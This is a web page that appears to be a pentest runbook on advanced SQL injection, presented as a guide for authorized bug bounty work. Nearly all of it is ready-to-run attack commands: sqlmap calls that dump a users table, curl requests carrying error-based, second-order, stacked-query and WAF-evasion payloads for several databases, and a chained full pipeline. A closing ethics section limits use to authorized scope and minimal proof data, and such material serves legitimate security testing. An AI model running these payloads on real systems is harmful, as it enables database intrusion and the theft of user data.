Webupdated Oct 1, 2026
SQL Injection — Advanced Techniques
Second-order, error-based, and stacked-query SQLi with database-specific tricks and chained WAF evasion.
toolbox:sqlmapcurlffuf
An advanced SQL injection runbook for bug bounty / authorized pentest on in-scope targets only. Goal: extract proof-of-access data when output is filtered, timing is noisy, or a WAF sits in front, building on a confirmed injection point.
1. Confirm and fingerprint
sqlmap -u "https://target.com/api/item?id=1" --batch --level 2 --risk 1 --threads 1
curl -s "https://target.com/api/item?id=1%27"
curl -s "https://target.com/api/item?id=1%20AND%201=1" -o /dev/null -w '%{size_download}\n'
curl -s "https://target.com/api/item?id=1%20AND%201=2" -o /dev/null -w '%{size_download}\n'
2. Second-order injection
Store a payload now, trigger it later in a different query.
curl -s -X POST "https://target.com/api/profile" \
-H "Cookie: session=$SESSION" -H "Content-Type: application/json" \
-d "{\"username\":\"admin'--\"}"
curl -s "https://target.com/api/reports/summary" -H "Cookie: session=$SESSION"
3. Error-based extraction
# MySQL
curl -s "https://target.com/api/item?id=1%27%20AND%20extractvalue(1,concat(0x7e,(SELECT%20version())))--%20-"
# MSSQL
curl -s "https://target.com/api/item?id=1%27%20AND%201=CONVERT(int,(SELECT%20TOP%201%20name%20FROM%20users))--%20-"
# PostgreSQL
curl -s "https://target.com/api/item?id=1%27%20AND%201=CAST((SELECT%20version())%20AS%20int)--%20-"
4. Stacked queries and DB-specific tricks
curl -s "https://target.com/api/item?id=1%27;%20SELECT%20pg_sleep(5)--%20-"
sqlmap -u "https://target.com/api/item?id=1" --batch --dbms=postgresql \
--stacked-queries --technique=S --threads 1
DB shortcuts: MySQL information_schema/GROUP_CONCAT; PostgreSQL pg_catalog/COPY; MSSQL OPENROWSET/xp_cmdshell; Oracle UTL_HTTP/dual.
5. Filter and WAF evasion chains
curl -s "https://target.com/api/item?id=1/**/UNION/**/SELECT/**/1,2,3"
curl -s "https://target.com/api/item?id=1%2527"
curl -s "https://target.com/api/item?id=1%27%20/*!50000UNION*/%20/*!50000SELECT*/%201,2,3"
ffuf -u "https://target.com/api/item?id=FUZZ" -w sqli.txt -mc all -fs 0
6. Optimize blind extraction
sqlmap -u "https://target.com/api/item?id=1" --batch --technique=B \
--level 2 --risk 1 --threads 1 --dump -T users --where="id=1" --stop 1
Prefer boolean over time-based; cap requests and limit dumps to a single proof row.
Full pipeline
B="https://target.com/api/item"
sqlmap -u "$B?id=1" --batch --level 2 --risk 1 --threads 1
curl -s "$B?id=1%20AND%201=1" -o /dev/null -w 'true: %{size_download}\n'
curl -s "$B?id=1%20AND%201=2" -o /dev/null -w 'false: %{size_download}\n'
curl -s -X POST "https://target.com/api/profile" \
-H "Cookie: session=$SESSION" -H "Content-Type: application/json" \
-d "{\"username\":\"admin'--\"}"
curl -s "https://target.com/api/reports/summary" -H "Cookie: session=$SESSION"
curl -s "$B?id=1%27%20AND%20extractvalue(1,concat(0x7e,(SELECT%20version())))--%20-"
curl -s "$B?id=1%27%20/*!50000UNION*/%20/*!50000SELECT*/%201,2,3"
sqlmap -u "$B?id=1" --batch --level 2 --risk 1 --threads 1 \
--technique=B --dump -T users --where="id=1" --stop 1
Ethics & legality
- Only test injection on targets and parameters within the authorized scope.
- Never issue destructive statements (
DROP,DELETE,UPDATE) or usexp_cmdshellunless explicitly authorized. - Extract only the minimum proof row; do not dump user tables wholesale.
- Keep sqlmap risk/level low and add delays so you do not degrade the service.